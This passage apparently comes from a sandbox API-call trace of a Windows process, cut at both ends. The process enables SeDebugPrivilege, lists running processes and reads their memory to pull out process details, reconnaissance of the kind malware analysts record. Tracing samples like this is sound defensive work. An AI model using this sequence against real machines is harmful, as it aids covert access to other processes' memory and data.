(hModule=0x7ffdab590000, lpProcName="NtFsControlFile") returned 0x7ffdab635460 [0263.941] GetProcAddress (hModule=0x7ffdab590000, lpProcName="NtQueryVolumeInformationFile") returned 0x7ffdab635660 [0263.941] malloc (_Size=0x18) returned 0xdb6320 [0263.941] GetCurrentThread () returned 0xfffffffffffffffe [0263.941] OpenThreadToken (in: ThreadHandle=0xfffffffffffffffe, DesiredAccess=0x28, OpenAsSelf=1, TokenHandle=0x138d660 | out: TokenHandle=0x138d660*=0x28c) returned 1 [0263.941] LookupPrivilegeValueW (in: lpSystemName=0x0, lpName="SeDebugPrivilege", lpLuid=0x138d69c | out: lpLuid=0x138d69c*(LowPart=0x14, HighPart=0)) returned 1 [0263.944] RtlRestoreLastWin32Error () returned 0x35d000 [0263.944] AdjustTokenPrivileges (in: TokenHandle=0x28c, DisableAllPrivileges=0, NewState=0x138d698*(PrivilegesCount=0x1, Privileges=((Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0263.944] GetLastError () returned 0x0 [0263.944] CloseHandle (hObject=0x28c) returned 1 [0263.944] malloc (_Size=0x8000) returned 0xdb8710 [0263.944] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xdb8710, Length=0x8000, ResultLength=0x0 | out: SystemInformation=0xdb8710, ResultLength=0x0) returned 0xc0000004 [0263.953] free (_Block=0xdb8710) [0263.954] malloc (_Size=0x10000) returned 0xdb8710 [0263.957] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xdb8710, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0xdb8710, ResultLength=0x0) returned 0xc0000004 [0263.961] free (_Block=0xdb8710) [0263.961] malloc (_Size=0x18000) returned 0xdb8710 [0263.961] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xdb8710, Length=0x18000, ResultLength=0x0 | out: SystemInformation=0xdb8710, ResultLength=0x0) returned 0xc0000004 [0263.965] free (_Block=0xdb8710) [0263.965] malloc (_Size=0x20000) returned 0xdb8710 [0263.965] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0xdb8710, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0xdb8710, ResultLength=0x0) returned 0x0 [0263.968] _ui64tow_s (in: _Value=0x0, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="0") returned 0x0 [0263.969] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="0") returned 1 [0263.969] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0xab5b2958, dwBuildNumber=0x7ffd, dwPlatformId=0x0, szCSDVersion="\n") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.969] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.970] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0263.970] CloseHandle (hObject=0x0) returned 0 [0263.971] _ui64tow_s (in: _Value=0x4, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="4") returned 0x0 [0263.971] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="4") returned 1 [0263.971] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.971] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.972] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0263.972] CloseHandle (hObject=0x0) returned 0 [0263.973] _ui64tow_s (in: _Value=0x12c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="300") returned 0x0 [0263.973] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="300") returned 3 [0263.973] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.973] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.974] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x12c) returned 0x0 [0263.975] CloseHandle (hObject=0x0) returned 0 [0263.975] _ui64tow_s (in: _Value=0x174, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="372") returned 0x0 [0263.975] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="372") returned 3 [0263.976] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.976] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.977] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x174) returned 0x0 [0263.977] CloseHandle (hObject=0x0) returned 0 [0263.977] _ui64tow_s (in: _Value=0x1bc, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="444") returned 0x0 [0263.978] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="444") returned 3 [0263.978] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.978] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.979] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1bc) returned 0x0 [0263.979] CloseHandle (hObject=0x0) returned 0 [0263.979] _ui64tow_s (in: _Value=0x1c8, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="456") returned 0x0 [0263.980] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="456") returned 3 [0263.980] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.980] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.981] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0263.981] CloseHandle (hObject=0x0) returned 0 [0263.981] _ui64tow_s (in: _Value=0x1fc, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="508") returned 0x0 [0263.981] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="508") returned 3 [0263.981] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.981] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.982] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x1fc) returned 0x28c [0263.982] GetLastError () returned 0x0 [0263.982] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0263.982] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x398018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0263.982] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0263.982] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1630, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0263.983] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1340, lpBuffer=0x138c580, nSize=0x42, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0263.983] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0263.983] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0263.983] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x398020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0263.983] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b0d20, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0263.983] malloc (_Size=0x1c) returned 0xdb7380 [0263.983] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4b1382, lpBuffer=0xdb7380, nSize=0x1a, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb7380*, lpNumberOfBytesRead=0x0) returned 1 [0263.983] free (_Block=0xdb7380) [0263.984] CloseHandle (hObject=0x28c) returned 1 [0263.984] _ui64tow_s (in: _Value=0x214, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="532") returned 0x0 [0263.984] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="532") returned 3 [0263.984] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.984] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.985] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x214) returned 0x0 [0263.985] CloseHandle (hObject=0x0) returned 0 [0263.985] _ui64tow_s (in: _Value=0x21c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="540") returned 0x0 [0263.985] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="540") returned 3 [0263.985] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.985] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.986] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x21c) returned 0x28c [0263.986] GetLastError () returned 0x0 [0263.986] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0263.986] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x303018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0263.986] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0263.987] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x603240, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0263.987] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602e98, lpBuffer=0x138c580, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0263.987] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0263.987] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0263.987] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x303020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0263.987] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602880, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0263.987] malloc (_Size=0x3e) returned 0xdacc90 [0263.987] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x602ed4, lpBuffer=0xdacc90, nSize=0x3c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdacc90*, lpNumberOfBytesRead=0x0) returned 1 [0263.988] free (_Block=0xdacc90) [0263.988] CloseHandle (hObject=0x28c) returned 1 [0263.989] _ui64tow_s (in: _Value=0x274, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="628") returned 0x0 [0263.989] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="628") returned 3 [0263.989] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.989] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.990] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x274) returned 0x28c [0263.990] GetLastError () returned 0x0 [0263.990] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0263.990] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3a0018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0263.990] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0263.990] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403370, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0263.990] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402fd8, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0263.990] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0263.991] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0263.991] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x3a0020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0263.991] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4029c0, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0263.991] malloc (_Size=0x5e) returned 0xdafee0 [0263.991] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403018, lpBuffer=0xdafee0, nSize=0x5c, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdafee0*, lpNumberOfBytesRead=0x0) returned 1 [0263.991] free (_Block=0xdafee0) [0263.992] CloseHandle (hObject=0x28c) returned 1 [0263.992] _ui64tow_s (in: _Value=0x294, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="660") returned 0x0 [0263.992] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="660") returned 3 [0263.992] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.992] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.993] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x294) returned 0x28c [0263.993] GetLastError () returned 0x0 [0263.993] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0263.993] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d0018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0263.993] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0263.993] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x4033e0, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0263.993] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403058, lpBuffer=0x138c580, nSize=0x40, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0263.994] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0263.994] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0263.994] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x2d0020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0263.994] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x402a40, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0263.994] malloc (_Size=0x54) returned 0xdb7e10 [0263.994] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x403098, lpBuffer=0xdb7e10, nSize=0x52, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb7e10*, lpNumberOfBytesRead=0x0) returned 1 [0263.995] free (_Block=0xdb7e10) [0263.995] CloseHandle (hObject=0x28c) returned 1 [0263.995] _ui64tow_s (in: _Value=0x32c, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="812") returned 0x0 [0263.995] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="812") returned 3 [0263.995] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.995] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.996] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x32c) returned 0x28c [0263.996] GetLastError () returned 0x0 [0263.996] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0263.996] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x316018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0263.996] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0263.996] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x581980, lpBuffer=0x138cc30, nSize=0x118, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138cc30*, lpNumberOfBytesRead=0x0) returned 1 [0263.997] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x581678, lpBuffer=0x138c580, nSize=0x38, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c580*, lpNumberOfBytesRead=0x0) returned 1 [0263.997] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x1, ProcessInformation=0x138c880, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c880, ReturnLength=0x0) returned 0x0 [0263.997] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c358, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c358, ReturnLength=0x0) returned 0x0 [0263.997] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x316020, lpBuffer=0x138c340, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c340*, lpNumberOfBytesRead=0x0) returned 1 [0263.997] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x581060, lpBuffer=0x138c390, nSize=0x410, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c390*, lpNumberOfBytesRead=0x0) returned 1 [0263.997] malloc (_Size=0x16) returned 0xdb5d40 [0263.997] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x5816b0, lpBuffer=0xdb5d40, nSize=0x14, lpNumberOfBytesRead=0x0 | out: lpBuffer=0xdb5d40*, lpNumberOfBytesRead=0x0) returned 1 [0263.997] free (_Block=0xdb5d40) [0263.997] CloseHandle (hObject=0x28c) returned 1 [0263.998] _ui64tow_s (in: _Value=0x364, _Buffer=0x138d750, _BufferCount=0x104, _Radix=10 | out: _Buffer="868") returned 0x0 [0263.998] _vsnwprintf (in: _Buffer=0x138d470, _BufferCount=0x103, _Format="%lu", _ArgList=0x138c7f8 | out: _Buffer="868") returned 3 [0263.998] GetVersionExW (in: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="") | out: lpVersionInformation=0x138c8b0*(dwOSVersionInfoSize=0x114, dwMajorVersion=0xa, dwMinorVersion=0x0, dwBuildNumber=0x295a, dwPlatformId=0x2, szCSDVersion="")) returned 1 [0263.998] _vsnwprintf (in: _Buffer=0x138d260, _BufferCount=0x103, _Format="%d.%d.%hu", _ArgList=0x138c7f8 | out: _Buffer="10.0.10586") returned 10 [0263.999] OpenProcess (dwDesiredAccess=0x410, bInheritHandle=0, dwProcessId=0x364) returned 0x28c [0263.999] GetLastError () returned 0x0 [0263.999] NtQueryInformationProcess (in: ProcessHandle=0x28c, ProcessInformationClass=0x0, ProcessInformation=0x138c850, ProcessInformationLength=0x30, ReturnLength=0x0 | out: ProcessInformation=0x138c850, ReturnLength=0x0) returned 0x0 [0263.999] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x381018, lpBuffer=0x138c820, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c820*, lpNumberOfBytesRead=0x0) returned 1 [0263.999] ReadProcessMemory (in: hProcess=0x28c, lpBaseAddress=0x7ffdab6d5220, lpBuffer=0x138c810, nSize=0x8, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x138c810*, lpNumberOfBytesRead=0x0) returned 1 [0263.999] ReadProcessMemory (in: 